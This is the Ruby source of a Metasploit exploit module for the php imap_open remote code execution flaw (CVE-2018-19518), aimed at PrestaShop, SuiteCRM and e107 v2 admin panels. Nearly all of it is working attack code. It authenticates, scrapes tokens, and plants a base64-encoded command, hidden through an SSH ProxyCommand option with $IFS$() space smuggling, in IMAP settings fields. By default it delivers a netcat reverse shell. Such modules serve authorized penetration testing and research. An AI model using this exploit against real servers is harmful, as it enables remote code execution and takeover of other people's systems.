## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'php imap_open Remote Code Execution', 'Description' => %q{ The imap_open function within php, if called without the /norsh flag, will attempt to preauthenticate an IMAP session. On Debian based systems, including Ubuntu, rsh is mapped to the ssh binary. Ssh's ProxyCommand option can be passed from imap_open to execute arbitrary commands. While many custom applications may use imap_open, this exploit works against the following applications: e107 v2, prestashop, SuiteCRM, as well as Custom, which simply prints the exploit strings for use. Prestashop exploitation requires the admin URI, and administrator credentials. suiteCRM/e107/hostcms require administrator credentials. }, 'Author' => [ 'Anton Lopanitsyn', # Vulnerability discovery and PoC 'Twoster', # Vulnerability discovery and PoC 'h00die' # Metasploit Module ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'https://web.archive.org/web/20181118213536/https://antichat.com/threads/463395' ], [ 'URL', 'https://github.com/Bo0oM/PHP_imap_open_exploit' ], [ 'EDB', '45865'], [ 'URL', 'https://bugs.php.net/bug.php?id=76428'], [ 'CVE', '2018-19518'] ], 'Privileged' => false, 'Platform' => [ 'unix' ], 'Arch' => ARCH_CMD, 'Targets' => [ [ 'prestashop', {} ], [ 'suitecrm', {}], [ 'e107v2', {'WfsDelay' => 90}], # may need to wait for cron [ 'custom', {'WfsDelay' => 300}] ], 'PrependFork' => true, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat', 'WfsDelay' => 120 }, 'DefaultTarget' => 0, 'DisclosureDate' => 'Oct 23 2018')) register_options( [ OptString.new('TARGETURI', [ true, "Base directory path", '/admin2769gx8k3']), OptString.new('USERNAME', [ false, "Username to authenticate with", '']), OptString.new('PASSWORD', [ false, "Password to authenticate with", '']) ]) end def check if target.name =~ /prestashop/ uri = normalize_uri(target_uri.path) res = send_request_cgi({'uri' => uri}) if res && (res.code == 301 || res.code == 302) return CheckCode::Detected end elsif target.name =~ /suitecrm/ #login page GET /index.php?action=Login&module=Users vprint_status('Loading login page') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'vars_get' => { 'action' => 'Login', 'module' => 'Users' } ) unless res print_error('Error loading site. Check options.') return end if res.code = 200 return CheckCode::Detected end end CheckCode::Safe end def command(spaces='$IFS$()') #payload is base64 encoded, and stuffed into the SSH option. enc_payload = Rex::Text.encode_base64(payload.encoded) command = "-oProxyCommand=`echo #{enc_payload}|base64 -d|bash`" #final payload can not contain spaces, however $IFS$() will return the space we require command.gsub!(' ', spaces) end def exploit if target.name =~ /prestashop/ uri = normalize_uri(target_uri.path) res = send_request_cgi({'uri' => uri}) if res && res.code != 301 print_error('Admin redirect not found, check URI. Should be something similar to /admin2769gx8k3') return end #There are a bunch of redirects that happen, so we automate going through them to get to the login page. while res.code == 301 || res.code == 302 cookie = res.get_cookies uri = res.headers['Location'] vprint_status("Redirected to #{uri}") res = send_request_cgi({'uri' => uri}) end #Tokens are generated for each URL or sub-component, we need valid ones! /.*token=(?<token>\w{32})/ =~ uri /id="redirect" value="(?<redirect>.*)"\/>/ =~ res.body cookie = res.get_cookies unless token && redirect print_error('Unable to find token and redirect URL, check options.') return end vprint_status("Token: #{token} and Login Redirect: #{redirect}") print_status("Logging in with #{datastore['USERNAME']}:#{datastore['PASSWORD']}") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'index.php'), 'cookie' => cookie, 'vars_post' => { 'ajax' => 1, 'token' => '', 'controller' => 'AdminLogin', 'submitLogin' => '1', 'passwd' => datastore['PASSWORD'], 'email' => datastore['USERNAME'], 'redirect' => redirect }, 'vars_get' => { 'rand' => '1542582364810' #not sure if this will hold true forever, I didn't see where it is being generated } ) if res && res.body.include?('Invalid password') print_error('Invalid Login') return end vprint_status("Login JSON Response: #{res.body}") uri = JSON.parse(res.body)['redirect'] cookie = res.get_cookies print_good('Login Success, loading admin dashboard to pull tokens') res = send_request_cgi({'uri' => uri, 'cookie' => cookie}) /AdminCustomerThreads&token=(?<token>\w{32})/ =~ res.body vprint_status("Customer Threads Token: #{token}") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'index.php'), 'cookie' => cookie, 'vars_get' => { 'controller' => 'AdminCustomerThreads', 'token' => token } }) /form method="post" action="index\.php\?controller=AdminCustomerThreads&token=(?<token>\w{32})/ =~ res.body print_good("Sending Payload with Final Token: #{token}") data = Rex::MIME::Message.new data.add_part('1', nil, nil, 'form-data; name="PS_CUSTOMER_SERVICE_FILE_UPLOAD"') data.add_part("Dear Customer,\n\nRegards,\nCustomer service", nil, nil, 'form-data; name="PS_CUSTOMER_SERVICE_SIGNATURE_1"') data.add_part("x #{command}}", nil, nil, 'form-data; name="PS_SAV_IMAP_URL"') data.add_part('143', nil, nil, 'form-data; name="PS_SAV_IMAP_PORT"') data.add_part(Rex::Text.rand_text_alphanumeric(8), nil, nil, 'form-data; name="PS_SAV_IMAP_USER"') data.add_part(Rex::Text.rand_text_alphanumeric(8), nil, nil, 'form-data; name="PS_SAV_IMAP_PWD"') data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_DELETE_MSG"') data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_CREATE_THREADS"') data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_POP3"') data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_NORSH"') data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_SSL"') data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_VALIDATE-CERT"') data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_NOVALIDATE-CERT"') data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_TLS"') data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_NOTLS"') data.add_part('', nil, nil, 'form-data; name="submitOptionscustomer_thread"') send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'index.php'), 'ctype' => "multipart/form-data; boundary=#{data.bound}", 'data' => data.to_s, 'cookie' => cookie, 'vars_get' => { 'controller' => 'AdminCustomerThreads', 'token' => token } ) print_status('IMAP server change left on server, manual revert required.') if res && res.body.include?('imap Is Not Installed On This Server') print_error('PHP IMAP mod not installed/enabled ') end elsif target.name =~ /suitecrm/ #login page GET /index.php?action=Login&module=Users vprint_status('Loading login page') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'vars_get' => { 'action' => 'Login', 'module' => 'Users' } ) unless res print_error('Error loading site. Check options.') return end if res.code = 200 cookie = res.get_cookies else print_error("HTTP code #{res.code} found, check options.") return end vprint_status("Logging in as #{datastore['USERNAME']}:#{datastore['PASSWORD']}") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'index.php'), 'cookie' => cookie, 'vars_post' => { 'module' => 'Users', 'action' => 'Authenticate', 'return_module' => 'Users', 'return_action' => 'Login', 'cant_login' => '', 'login_module' => '', 'login_action' => '', 'login_record' => '', 'login_token' => '', 'login_oauth_token' => '', 'login_mobile' => '', 'user_name' => datastore['USERNAME'], 'username_password' => datastore['PASSWORD'], 'Login' => 'Log+In' } ) unless res print_error('Error loading site. Check options.') return end if res.code = 302 cookie = res.get_cookies print_good('Login Success') else print_error('Failed Login, check options.') end #load the email settings page to get the group_id vprint_status('Loading InboundEmail page') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'cookie' => cookie, 'vars_get' => { 'module' => 'InboundEmail', 'action' => 'EditView' } ) unless res print_error('Error loading site.') return end /"group_id" value="(?<group_id>\w{8}-\w{4}-\w{4}-\w{4}-\w{12})">/ =~ res.body unless group_id print_error('Could not identify group_id from form page') return end print_good("Sending payload with group_id #{group_id}") referer = "http://#{datastore['RHOST']}#{normalize_uri(target_uri.path, 'index.php')}?module=InboundEmail&action=EditView" res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'index.php'), 'cookie' => cookie, #required to prevent CSRF protection from triggering 'headers' => { 'Referer' => referer}, 'vars_post' => { 'module' => 'InboundEmail', 'record' => '', 'origin_id' => '', 'isDuplicate' => 'false', 'action' => 'Save', 'group_id' => group_id, 'return_module' => '', 'return_action' => '', 'return_id' => '', 'personal' => '', 'searchField' => '', 'mailbox_type' => '', 'button' => ' Save ', 'name' => Rex::Text.rand_text_alphanumeric(8), 'status' => 'Active', 'server_url' => "x #{command}}", 'email_user' => Rex::Text.rand_text_alphanumeric(8), 'protocol' => 'imap', 'email_password' => Rex::Text.rand_text_alphanumeric(8), 'port' => '143', 'mailbox' => 'INBOX', 'trashFolder' => 'TRASH', 'sentFolder' => '', 'from_name' => Rex::Text.rand_text_alphanumeric(8), 'is_auto_import' => 'on', 'from_addr' => "#{Rex::Text.rand_text_alphanumeric(8)}@#{Rex::Text.rand_text_alphanumeric(8)}.org", 'reply_to_name' => '', 'distrib_method' => 'AOPDefault', 'distribution_user_name' => '', 'distribution_user_id' => '', 'distribution_options[0]' => 'all', 'distribution_options[1]' => '', 'distribution_options[2]' => '', 'create_case_template_id' => '', 'reply_to_addr' => '', 'template_id' => '', 'filter_domain' => '', 'email_num_autoreplies_24_hours' => '10', 'leaveMessagesOnMailServer' => '1' } ) if res && res.code == 200 print_error('Triggered CSRF protection, may try exploitation manually.') end print_status('IMAP server config left on server, manual removal required.') elsif target.name =~ /e107v2/ # e107 has an encoder which prevents $IFS$() from being used as $ = $ # \t also became /t, however "\t" does seem to work. # e107 also uses a cron job to check bounce jobs, which may not be active. # either cron can be disabled, or bounce checks disabled, so we try to # kick the process manually, however if it doesn't work we'll hope # cron is running and we get a call back anyways. vprint_status("Logging in as #{datastore['USERNAME']}:#{datastore['PASSWORD']}") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'e107_admin', 'admin.php'), 'vars_post' => { 'authname' => datastore['USERNAME'], 'authpass' => datastore['PASSWORD'], 'authsubmit' => 'Log In' }) unless res print_error('Error loading site. Check options.') return end if res.code == 302 cookie = res.get_cookies print_good('Login Success') else print_error('Failed Login, check options.') end vprint_status('Checking if Cron is enabled for triggering') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'e107_admin', 'cron.php'), 'cookie' => cookie ) unless res print_error('Error loading site. Check options.') return end if res.body.include? 'Status: <b>Disabled</b>' print_error('Cron disabled, unexploitable.') return end print_good('Storing payload in mail settings') # the imap/pop field is hard to find. Check Users > Mail # then check "Bounced emails - Processing method" and set it to "Mail account" send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'e107_admin', 'mailout.php'), 'cookie' => cookie, 'vars_get' => { 'mode' => 'prefs', 'action' => 'prefs' }, 'vars_post' => { 'testaddress' => '[email protected]', 'testtemplate' => 'textonly', 'bulkmailer' => 'smtp', 'smtp_server' => '1.1.1.1', 'smtp_username' => 'username', 'smtp_password' => 'password', 'smtp_port' => '25', 'smtp_options' => '', 'smtp_keepalive' => '0', 'smtp_useVERP' => '0', 'mail_sendstyle' => 'texthtml', 'mail_pause' => '3', 'mail_pausetime' => '4', 'mail_workpertick' => '5', 'mail_log_option' => '0', 'mail_bounce' => 'mail', 'mail_bounce_email2' => '', 'mail_bounce_email' => "#{Rex::Text.rand_text_alphanumeric(8)}@#{Rex::Text.rand_text_alphanumeric(8)}.org", 'mail_bounce_pop3' => "x #{command("\t")}}", 'mail_bounce_user' => Rex::Text.rand_text_alphanumeric(8), 'mail_bounce_pass' => Rex::Text.rand_text_alphanumeric(8), 'mail_bounce_type' => 'imap', 'mail_bounce_auto' => '1', 'updateprefs' => 'Save Changes' }) vprint_status('Loading cron page to execute job manually') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'e107_admin', 'cron.php'), 'cookie' => cookie ) unless res print_error('Error loading site. Check options.') return end if /name='e-token' value='(?<etoken>\w{32})'/ =~ res.body && /_system::procEmailBounce.+?cron_execute\[(?<cron_id>\d)\]/m =~ res.body print_good("Triggering manual run of mail bounch check cron to execute payload with cron id #{cron_id} and etoken #{etoken}") # The post request has several duplicate columns, however all were not required. Left them commented for documentation purposes send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'e107_admin', 'cron.php'), 'cookie' => cookie, 'vars_post' => { 'e-token' => etoken, #'e-columns[]' => 'cron_category', 'e-columns[]' => 'cron_name', #'e-columns[]' => 'cron_description', #'e-columns[]' => 'cron_function', #'e-columns[]' => 'cron_tab', #'e-columns[]' => 'cron_lastrun', #'e-columns[]' => 'cron_active', "cron_execute[#{cron_id}]" => '1', 'etrigger_batch' => '' }) else print_error('e-token not found, required for manual exploitation. Wait 60sec, cron may still trigger.') end print_status('IMAP server config left on server, manual removal required.') elsif target.name =~ /custom/ print_status('Listener started for 300 seconds') print_good("POST request connection string: x #{command}}") # URI.encode leaves + as + since that's a space encoded. So we manually change it. print_good("GET request connection string: #{URI.encode("x " + command + "}").sub! '+', '%2B'}") end end end